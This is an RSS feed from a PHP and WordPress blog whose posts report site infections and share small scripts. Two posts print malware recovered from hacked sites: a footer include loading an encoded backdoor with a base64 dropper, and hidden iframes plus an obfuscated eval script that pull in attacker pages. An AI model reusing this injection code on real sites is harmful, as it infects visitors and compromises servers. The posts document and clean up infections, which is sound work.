<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Proxyutza blog &#187; PHP</title>
	<atom:link href="http://www.proxyutza.com/category/php/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.proxyutza.com</link>
	<description>About all sorth of things: PHP, Hacks, Scripts, Servers, Linux, Technology, News, Trends</description>
	<lastBuildDate>Wed, 26 May 2010 10:37:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>WordPress hacked with Zend encoded script</title>
		<link>http://www.proxyutza.com/wordpress-hacked-with-zend-encoded-script/</link>
		<comments>http://www.proxyutza.com/wordpress-hacked-with-zend-encoded-script/#comments</comments>
		<pubDate>Wed, 26 May 2010 10:29:27 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[base_64]]></category>
		<category><![CDATA[encoding]]></category>
		<category><![CDATA[zend]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/?p=120</guid>
		<description><![CDATA[This time happened on Hostgator, I found the following code in my footer.php file: 1 2 &#60;?php @include_once&#40;ABSPATH . &#34;/wp-includes/wp-vars.php&#34;&#41;; ?&#62; &#60;?=@get_wp_results&#40;'f'&#41;;?&#62; This totally screwed my footer section and above that it made my website traffic go to zero. I immediately removed the code and discovered two files: wp-includes/wp-vars.php encoded with Zend which I am [...]]]></description>
			<content:encoded><![CDATA[<p>This time happened on Hostgator, I found the following code in my footer.php file:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
</pre></td><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> <span style="color: #339933;">@</span><span style="color: #b1b100;">include_once</span><span style="color: #009900;">&#40;</span>ABSPATH <span style="color: #339933;">.</span> <span style="color: #0000ff;">&quot;/wp-includes/wp-vars.php&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">?&gt;</span>
<span style="color: #000000; font-weight: bold;">&lt;?=</span><span style="color: #339933;">@</span>get_wp_results<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'f'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #000000; font-weight: bold;">?&gt;</span></pre></td></tr></table></div>

<p>This totally screwed my footer section and above that it made my website traffic go to zero. I immediately removed the code and discovered two files:<br />
<strong>wp-includes/wp-vars.php </strong>encoded with Zend which I am unable to decode. It would be great if someone could decode this so we can see the malicious code.<br />
<strong>wp-includes/wp-version.php </strong>encoded with base_64 and decoded to :<br />
<strong>file_put_contents(&#8216;wp-common.php&#8217;,base64_decode($bb) )</strong></p>
<p>I deleted both of these files and everything seems ok now. I was unable to find wp-common.php so I assume it wasn&#8217;t created yet.<br />
wp-includes/wp-vars.php encoded with Zendwp-includes/wp-version.php</p>
<p>Downloads:<br />
<a href='http://www.proxyutza.com/wp-content/uploads/2010/05/wp-vars.zip'>wp-vars</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/wordpress-hacked-with-zend-encoded-script/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Magento Admin Menu Not Working (js 404 error)</title>
		<link>http://www.proxyutza.com/magento-admin-menu-not-working/</link>
		<comments>http://www.proxyutza.com/magento-admin-menu-not-working/#comments</comments>
		<pubDate>Wed, 05 Nov 2008 17:16:47 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[AJAX]]></category>
		<category><![CDATA[Magento]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[chmod]]></category>
		<category><![CDATA[javascript]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/?p=64</guid>
		<description><![CDATA[While i was installing a Magento oscommerce platform I encountered a problem, a new problem i might add, because i never saw it before. I&#8217;ve worked before with Magento but never had any issues. This time, after getting it up and running i noticed that my admin menu wasn&#8217;t working, the options weren&#8217;t dropping down [...]]]></description>
			<content:encoded><![CDATA[<p>While i was installing a <strong>Magento oscommerce platform</strong> I encountered a problem, a new problem i might add, because i never saw it before. I&#8217;ve worked before with Magento but never had any issues. This time, after getting it up and running i noticed that my <strong>admin menu wasn&#8217;t working</strong>, the options weren&#8217;t dropping down as usual.</p>
<p>You obviously can&#8217;t work without a menu so i started googling the issue. The first page i looked into gave some indications but nothing clear, and those guys we&#8217;re having the problem on ver 1.0 of Magento which is really old.</p>
<p>After trying and testing various methods i finally got it to work, and here is how i did it:</p>
<ul>
<li>step1: replace app/code/core/Mage/Page/Block/Html/Head.php with this <a href="http://www.proxyutza.com/wp-content/uploads/2008/11/head.zip">head.php</a></li>
<li>step2: chmod 755 the js/ folder, and folders within.</li>
<li>step3: chmod 644 the javascript files inside js/lib/</li>
<li>step4: chmod 644 js/index.php</li>
<li>step5: there is no step 5 <img src='http://www.proxyutza.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  your menu is now working</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/magento-admin-menu-not-working/feed/</wfw:commentRss>
		<slash:comments>38</slash:comments>
		</item>
		<item>
		<title>Servage hacked: Exploit-Iframe (Trojan) Infection</title>
		<link>http://www.proxyutza.com/exploit-iframe-trojan-infection/</link>
		<comments>http://www.proxyutza.com/exploit-iframe-trojan-infection/#comments</comments>
		<pubDate>Fri, 07 Mar 2008 11:56:32 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[Mcafee]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/03/07/exploit-iframe-trojan-infection/</guid>
		<description><![CDATA[I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage&#8217;s servers [...]]]></description>
			<content:encoded><![CDATA[<p>I found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage&#8217;s servers but they denied it. They also said no one else reported this which i dont believe its true. The infection code is this :</p>
<p>&lt;code&gt;&lt;iframe src=&#8221;http://fredkidns.com/check/upd.php?t=562&#8243; border=&#8221;0&#8243; height=&#8221;0&#8243; width=&#8221;0&#8243;&gt;&lt;/iframe&gt;&lt;/code&gt;<br />
&lt;code&gt;&lt;iframe src=&#8221;http://bestinlive.cn/i/index.php&#8221; border=&#8221;0&#8243; height=&#8221;0&#8243; width=&#8221;0&#8243;&gt;<br />
&lt;/iframe&gt;&lt;script&gt;eval(unescape(&#8220;%77%69%6e%64%6f%77%2e%73%<br />
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75<br />
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%<br />
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%<br />
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%<br />
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2<br />
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68<br />
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%<br />
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%<br />
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3<br />
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6<br />
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65<br />
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29&#8243;)); &lt;/script&gt;&lt;/code&gt;</p>
<p>note: the line is so long that i had to insert line breaks<br />
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.</p>
<p><a href="http://www.proxyutza.com/2008/03/07/exploit-iframe-trojan-infection/exploit-iframe-trojan-infection-2/" rel="attachment wp-att-27" title="Exploit-Iframe (Trojan) Infection"><img src="http://www.proxyutza.com/wp-content/uploads/2008/03/mcafee-iframe-trojan.GIF" alt="Exploit-Iframe (Trojan) Infection" height="304" width="404" /></a></p>
<p>I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/exploit-iframe-trojan-infection/feed/</wfw:commentRss>
		<slash:comments>124</slash:comments>
		</item>
		<item>
		<title>PHP Delete Files Script</title>
		<link>http://www.proxyutza.com/php-delete-files-script/</link>
		<comments>http://www.proxyutza.com/php-delete-files-script/#comments</comments>
		<pubDate>Sun, 02 Mar 2008 18:39:05 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Delete]]></category>
		<category><![CDATA[Script]]></category>
		<category><![CDATA[unlink]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/03/02/php-delete-files-script/</guid>
		<description><![CDATA[I needed a script to delete all files inside a folder with certain extension, a script that could be executed with just a click. So here is how i did it: &#60;? { foreach (glob(&#8220;*.txt*&#8221;) as $fn) { unlink($fn); } } header(&#8220;Location: /1&#8243;); ?&#62; where *.txt is the extension im looking for delete and /1 [...]]]></description>
			<content:encoded><![CDATA[<p>I needed a script to delete all files inside a folder with certain extension, a script that could be executed with just a click. So here is how i did it:</p>
<blockquote><p> &lt;?<br />
{<br />
foreach (glob(&#8220;*.txt*&#8221;) as $fn) {<br />
unlink($fn);<br />
}<br />
}<br />
header(&#8220;Location: /1&#8243;);<br />
?&gt;</p></blockquote>
<p>where *.txt is the extension im looking for delete and /1 is the directory inside im placing the script. I saved the above in a file named Delete.php and placed it inside the directory. Then I chmod&#8217;ed the entire directory with the following command:</p>
<p><strong>chmod -R /var/www/1</strong></p>
<p>The script works without a flaw.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/php-delete-files-script/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Servage Hosting review</title>
		<link>http://www.proxyutza.com/servage-hosting-review/</link>
		<comments>http://www.proxyutza.com/servage-hosting-review/#comments</comments>
		<pubDate>Fri, 29 Feb 2008 10:24:22 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hosting]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[CURL]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[WAP]]></category>
		<category><![CDATA[Webhosting]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/02/29/servage-hosting-review/</guid>
		<description><![CDATA[I WAS WRONG. DO NOT CHOSE SERVAGE FOR HOSTING OR YOU WILL REGRET THE CHOOSE This is the phrase i looked on search engines for a couple of days before i choose&#8217;d my current webhosting. After reading dozens of articles and peoples reviews i decided to host with SERVAGE and i must say it was [...]]]></description>
			<content:encoded><![CDATA[<p><strong>I WAS WRONG. DO NOT CHOSE SERVAGE FOR HOSTING OR YOU WILL REGRET THE CHOOSE</strong></p>
<p><span style="text-decoration: line-through;">This is the phrase i looked on search engines for a couple of days before i choose&#8217;d my current webhosting. After reading dozens of articles and peoples reviews i decided to host with SERVAGE and i must say it was a good decision. They are probably the best hosting company on the market providing excellent support together with excellent services. Servage currently offers: 510 GB Web Space, 5010 GB Transfer, Unlimited FTP Accounts, 1000 MySQL Databases, PHP v 4.4.4 &amp; 5.2.1, Shockwave &amp; Flash, XML Support, EXIF Support, SSI Support, Private CGI-BIN, Zend Optimizer, Hotlink Protection, phpMyAdmin, ImageMagick Support, Ruby on Rails, Password Protected Directories, FTP Access, FTPS (Encrypted FTP), GD Support, Microsoft Frontpage Support, WAP Enabled, mod_rewrite Enabled, CGI/Perl, Python Support, ionCube Loader, CURL Enabled, Webbuilder Software Included, Netpbm Support, Wildcard Domains, Full .htaccess Support. Al these for just 6,95 EUR per month and bonus a free domain name included. Well you can see now why i choose&#8217;d Servage. The only thing that i was sceptical about was the Uptime, well im with Servage for over 4 month&#8217;s and i had no problems with them. And if i had issues with my websites they always kindly help me in solving them. Its great no question about it.</span></p>
<p><span style="text-decoration: line-through;">If you would like to get hosting from Servage you can use my coupon code and get 25 Gb extra of storage. My coupon code is <strong>CUST44248</strong></span></p>
<p><a title="Servage Hosting review" rel="attachment wp-att-17" href="http://www.proxyutza.com/servage-hosting-review/servage-hosting-review/" target="_blank"><img src="http://www.proxyutza.com/wp-content/uploads/2008/02/200x50-static-servage.thumbnail.gif" alt="Servage Hosting review" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/servage-hosting-review/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Decoding with the script from earlier post failed on some code</title>
		<link>http://www.proxyutza.com/decoding-with-the-script-from-earlier-post-failed-on-some-code/</link>
		<comments>http://www.proxyutza.com/decoding-with-the-script-from-earlier-post-failed-on-some-code/#comments</comments>
		<pubDate>Sat, 23 Feb 2008 14:02:15 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[base64_decode]]></category>
		<category><![CDATA[decode]]></category>
		<category><![CDATA[eval]]></category>
		<category><![CDATA[gzinflate]]></category>
		<category><![CDATA[theme]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/02/23/decoding-with-the-script-from-earlier-post-failed-on-some-code/</guid>
		<description><![CDATA[Today i tried to decode another pice of ugly code with &#8220;eval(gzinflate(base64_decode&#8221; and i was surprised to find that the script couldnt decode this piece. As usually the code is from a themes footer in which i dont want to keep theep the outgoing reffers. Here is the code: $_F=__FILE__;$_X='Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ [...]]]></description>
			<content:encoded><![CDATA[<p>Today i tried to decode another pice of ugly code with &#8220;eval(gzinflate(base64_decode&#8221; and i was surprised to find that the script couldnt decode this piece. As usually the code is from a themes footer in which i dont want to keep theep the outgoing reffers.</p>
<p>Here is the code:<br />
<code><br />
$_F=__FILE__;$_X='Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj<br />
JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD<br />
ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ<br />
gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP<br />
SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM<br />
jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ<br />
o8P3BocCAvKiAiSjNzdCB3aDF0IGQyIHkyMyB0aDRuayB5MjMncjUgZDI0bm<br />
cgRDF2NT8iICovID8+DQoNCgkJPD9waHAgd3BfZjIydDVyKCk7ID8+DQo8L2<br />
IyZHk+DQo8L2h0bWw+DQo=';eval(base64_decode('JF9YPWJhc2U2NF9k<br />
ZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdW<br />
llMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0<br />
YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));<br />
</code></p>
<p>For the moment i&#8217;m stuck with the code.. and trying to find a solution.. I will give an update if i succeed in decoding it.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/decoding-with-the-script-from-earlier-post-failed-on-some-code/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>How to decode ugly eval(gzinflate(base64_decode</title>
		<link>http://www.proxyutza.com/how-to-decode-ugly-evalgzinflatebase64_decode/</link>
		<comments>http://www.proxyutza.com/how-to-decode-ugly-evalgzinflatebase64_decode/#comments</comments>
		<pubDate>Thu, 21 Feb 2008 16:51:42 +0000</pubDate>
		<dc:creator>ProXy</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[base64_decode]]></category>
		<category><![CDATA[chmod]]></category>
		<category><![CDATA[eval]]></category>
		<category><![CDATA[gzinflate]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[PHP. script]]></category>
		<category><![CDATA[theme]]></category>

		<guid isPermaLink="false">http://www.proxyutza.com/2008/02/21/how-to-decode-ugly-evalgzinflatebase64_decode/</guid>
		<description><![CDATA[I just installed this great new theme, and i though everything is gonna be easy in customizing it. I don&#8217;t have a problem with keeping the authors link in the footer because its his credit and he diserve&#8217;s it but when he forces me trough this coded footer it becomes a problem. So i decided [...]]]></description>
			<content:encoded><![CDATA[<p>I just installed this great new theme, and i though everything is gonna be easy in customizing it. I don&#8217;t have a problem with keeping the authors link in the footer because its his credit and he diserve&#8217;s it but when he forces me trough this coded footer it becomes a problem. So i decided i want to remove this shit from my footer file. Where to start ? i didnt knew anything about gzinflate or base64_decode, so i googled after this things and came across this nice script that does all the job for you. As the author says a little disclaimer is needed so you don&#8217;t understand this wrong.</p>
<p>Disclaimer: I don&#8217;t condone modifying and distributing copyright files, this is simply provided so you can view the plain source to ensure your script isn&#8217;t doing anything malicious on your property ie server.</p>
<p>And here is the script and <a href="http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html" title="decoding">Link to authors page</a>.</p>
<blockquote><p><code>&lt;?php</code><br />
<code>echo "\nDECODE nested eval(gzinflate()) from Taree Internet <www.tareeinternet.com>\n\n";<br />
echo "1. Reading coded.txt\n";<br />
$fp1 = fopen ("coded.txt", "r");<br />
$contents = fread ($fp1, filesize ("coded.txt"));<br />
fclose($fp1);<br />
echo "2. Decoding\n";<br />
while (preg_match("/eval\(gzinflate/",$contents)) {<br />
$contents=preg_replace("/&lt;\?|\?&gt;/", "", $contents); eval(preg_replace("/eval/", "\$contents=", $contents)); } echo "3. Writing decoded.txt\n"; $fp2 = fopen("decoded.txt","w"); fwrite($fp2, trim($contents)); fclose($fp2);<br />
?&gt;</www.tareeinternet.com></code></p></blockquote>
<p>Now the first step you need to take is to save this code in a file named <strong>decrypt.php</strong></p>
<p>Second step is to save your encoded file inside a file name <strong>coded.txt</strong> (make sure you get all the code, i noticed when working with notepad and very long code lines some of the code gets skiped, and you dont want that to happen as the script wont work)</p>
<p>And the third step is to create an empty file named <strong>decoded.txt </strong></p>
<p>Now upload all three files on your webserver and chmod the <strong>decoded.txt</strong> file with 666</p>
<p>Next you need to run the <strong>decrypt.php</strong> file  from your server like this : http://yourdomain.com/path-to-script/decrypt.php. It should display a message about the operation and say &#8220;Writing Decoded.txt&#8221;. Now you are done the <strong>decoded.txt</strong> file that was empty should now have inside it the HTML code that you need to place inside your footer.php file and edit at your needs.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.proxyutza.com/how-to-decode-ugly-evalgzinflatebase64_decode/feed/</wfw:commentRss>
		<slash:comments>59</slash:comments>
		</item>
	</channel>
</rss>
